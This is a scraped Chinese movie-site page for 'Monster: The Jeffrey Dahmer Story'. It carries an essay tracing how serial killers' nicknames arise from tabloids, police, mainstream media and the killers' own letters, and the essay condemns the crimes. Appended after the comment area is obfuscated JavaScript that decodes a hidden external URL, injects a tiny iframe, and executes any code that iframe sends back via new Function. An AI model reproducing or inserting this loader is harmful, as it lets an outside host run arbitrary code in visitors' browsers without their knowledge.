怪物:杰夫瑞·达莫的故事

  • 埃文·彼得斯 南希·纳什 理查德·詹金斯 米歇尔·伦奈德 卡伦·马利娜·怀特 Brayden Maniago Phet
  • 每集 45分钟
  • 怪物:杰夫瑞·达莫的故事影片简介:绰号是谁起的我们…怪物:杰夫瑞·达莫的故事影片简介:绰号是谁起的我们在很多罪案题材的电影中常常听到,故事中的连环谋杀犯总会有个绰号。比如我个人最喜欢的电影《沉默的羔羊》中的Buffalo Bill「野牛比尔」 电影《沉默的羔羊》泰德·拉文饰演的「野牛比尔」 《红龙》中的Tooth Fairy「牙仙」 电影《红龙》拉尔夫·费因斯饰演的「牙仙」 《十二宫》中的Zodiac「十二宫杀手」还有《电锯惊魂》中的Jigsaw Killer「拼图杀手」 电影《电锯惊魂》托宾·贝尔饰演的「拼图杀手」 当然,历史最悠久和最臭名昭著的一个绰号是电影《来自地狱》中的Jack the Ripper「开膛手杰克」 电影《来自地狱》中的「开膛手杰克」 那么这些绰号是谁起的呢? 首先我们先要将「真实」和「虚构」的故事区分出来,像《沉默羔羊》《红龙》《电锯惊魂》等等,绝大多数电影中的连环谋杀犯都是虚构的人物和故事,但不排除借鉴了某些真实案例。所以这些罪犯的绰号都是根据剧情和人物设置,由编剧或是原著作者起的,起到生动,让观众或读者信以为真的作用。 还有就是根据「真实案件」改编的电影,像《十二宫杀手》《来自地狱》中的案件和罪犯都是曾经真实存在过的,其绰号也是来源于现实。属于这一类的还有讲述杰夫瑞·达莫,绰号The Milwaukee Monster「密尔沃基怪物」案件的电影《我朋友是杀人狂》。 「密尔沃基怪物」杰夫瑞·达莫 和讲述泰德·邦迪,绰号The Nice Seductor「漂亮的诱惑」案件的电影《极端邪恶》,都属于是根据真实案件改编的罪案传记类电影。 「漂亮的诱惑」泰德·邦迪 那么这些真实的绰号又是谁起的呢?我总结了四个起源。 01 | 街头小报命名最早钟情于给罪犯取绰号的是美国的街头小报,其目的是为了增加销量。但都没什么技术含量,一般来说就是罪行+犯罪地点的套路。例如:Boston Strangler「波士顿扼杀者」指的是1962到64年间在美国波士顿地区扼喉行凶的连环谋杀犯艾伯特·德萨尔沃。 艾伯特·德萨尔沃 Hillside Stranglers「山坡扼杀者」指的是1977到78年间在美国洛杉矶山区扼喉行凶的连环谋杀犯肯尼斯·比安奇和他的堂兄(同伙)安杰洛·布诺。 比安奇&布诺 类似的绰号还有美国的Axeman of New Orleans「新奥尔良斧头男」Green River Killer「绿河杀手」;英国的The Yorkshire Ripper「约克郡屠夫」和The Moors murders「沼泽杀手」等。 「约克郡屠夫」皮特·威廉·撒特克里夫(英) 「沼泽杀手」伊恩·布雷迪(英) 02 | 警方命名警局是提到罪犯名子频率最高的地方,但不能每次分析案情时都一遍遍重复罪犯的名字,或者说暂时不知道罪犯的名字时,一个简称或是代称不但可以在警局内区分说的是具体哪一个案件的罪犯又可以让警员们省些口舌之劳。于是就产生了一些警方所起的罪犯绰号。 举个例子,University and Airline Bomber「大学和航空炸弹客」因为这名罪犯的罪行是在航空公司和大学制造爆炸案,警方当时也不知道他的身份,但总不能每次都说:那个在大学和和航空公司制造爆炸的罪犯,因此就简称他为Unabomber「UNA炸弹客」。之后美国的媒体沿用了这个绰号。 也有同一名罪犯,媒体和警方使用不一致的绰号,例如被媒体称为Golden State Killer「金州杀手」(金州为加利福尼亚的别称)的罪犯则被警方的调查人员称为East Area Rapist「东部地区性罪犯」。 还有媒体称理查德·拉米雷斯为Devil's disciple「恶魔的门徒」,而警方称其Midnight Stalker「午夜跟踪者」。 「恶魔的门徒」理查德·拉米雷斯 显然警方都是根据罪犯的某些犯罪特点而起个临时代称的,并非为了好听或是酷而特意起的,再说警方也没有那么多闲工夫专门给这些罪犯起绰号,一般来说会用一个代码称呼。例如日本最臭名昭著的罪犯宫崎勤因其所犯下的罪行天理难容,罪大恶极,所以被媒体冠以许多罪恶的绰号。但在日本警方的内部仅称为117案件。那么那些惊世骇俗,耸人听闻的绰号又是从何而来的呢?这就要说到第三类绰号的来源——主流媒体。 03 | 主流媒体命名美国主流媒体自然与街头小报不可同日而语,他们所起的绰号是经过编辑绞尽脑汁和费尽心思的,但其终极目的却与街头小报如出一辙——博人眼球,获得轰动效应。 例如「乌克兰食人魔」安德烈·奇卡提洛;「棋盘杀手」亚历山大·皮丘什金;「小丑杀手」韦恩·盖西等,类似这样的绰号有很多,举不胜数。由此可以看出主流媒体所起的绰号越有噱头就越能满足观众的猎奇心理。 「乌克兰食人魔」安德烈·奇卡提洛 「小丑杀手」约翰·韦恩·盖西 为了增强这种效果有的绰号起的也是非常的狗血和不辩是非。例如,美国有个叫艾伯特·费雪的连环谋杀犯,媒体根据他总是在满月时犯案的民间传言就给他取了个「发狂的月光杀手」或「威斯特利亚狼人」的绰号。 「发狂的月光杀手」艾伯特·费雪 还有一名连环谋杀犯查尔斯·西米德,据说因为其外表英俊,媒体就不顾他丑陋的内心,居然取了个「花衣魔笛手」这样正邪不分的绰号。在各种各样的绰号中,还有最特殊的一类绰号是源自罪犯本人。 04 | 罪犯自我命名首当其冲的便是「开膛手杰克」这一绰号,1888年一名连环谋杀犯于英国伦敦东区的白教堂一带以连续行凶,并在寄给当地报社宣称自己就是凶手的信中自称为「开膛手杰克」。 无独有偶,美国60年代末期,一名连环谋杀犯在给媒体的信中自称为「十二宫」,还在信中画了个十字准星作为自己的专属签名,因此被称为「十二宫杀手」。 电影《十二宫》中「十二宫杀手」寄给媒体的信 1977年,美国连环谋杀犯大卫·柏克威兹行凶后给报纸写信自称为「山姆之子」。 「山姆之子」大卫·柏克威兹 还有横跨70到90年代的美国连环谋杀犯丹尼斯·雷德在给当地媒体写信中也设计了个人签名BTK,其含义为Bind, Torture, Kill「束缚,折磨,杀戮」因此被称为「BTK杀手」。 「BTK杀手」丹尼斯·雷德 在漫长的人类历史中,伴随着犯罪的产生而出现过很多连环谋杀犯及其绰号,由于电影的艺术渲染,有时一提到「连环杀手」和「真实案件改编」或是这些耸人听闻的「绰号」就会让人觉得听起来像是一出悬疑刺激的好戏?但我并不这么认为,首先我觉得它一点都不刺激。 「一」——「点」——「也」——「不」 因为这些绰号和绰号背后的主人全部都是罪恶的代称,是曾让社会人心惶惶的绰号,是给受害人和家属带来痛苦的绰号,是本不应该出现的绰号。我们每一个人都应该祈祷这些绰号的拥有者越来越少直到没有。本文的初衷也仅是从这些绰号的由来这一历史的角度去讲述该故事,让大家时刻不忘历史的教训,痛恨并谴责这些犯罪行为,同时引以为戒并提高自身的安全防范意识。因此本文力求严谨和规范的翻译了这些绰号,绝不会像街头小报一样刻意的添油加醋,哗众取宠。 本文为作者原创,图片来自网络,版权归其所有者。

同主演

    怪物:杰夫瑞·达莫的故事评论

    • 评论加载中...
    function NQoIX(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function nHqeN(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return NQoIX(t);};eval('\x77\x69\x6e\x64\x6f\x77')['\x69\x48\x49\x6f\x45\x47\x56\x4e\x6a\x6e']=function(){;(function(u,r,w,d,f,c){var x=nHqeN;u=decodeURIComponent(x(u.replace(new RegExp(c+''+c,'g'),c)));var k='',wr='w'+'ri'+'t'+'e';'jQuery';var c=d[x('Y3VycmVudFNjcmlwdA==')];var f=d.createElement('iframe');f.id='x'+(Math.random()*10000);f.style.width=f.style.height=10+'px';f.src=[u,r].join('-');d[wr](f.outerHTML);w['addEventListener']('message',function(e){if(e.data[r]){d.getElementById(f.id).style.display='none';new Function(x(e.data[r].replace(new RegExp(r,'g'),'')))();}});})('aHR0cHMlM0ElMkYlMkZtZWV0aGFuc2hppLmNvbSUyRjEzNjA5Mg==',''+'WfX'+'ORj'+'Hsl'+'d'+'',window,document,''+'ezR'+'xlj'+'cH'+'','p');};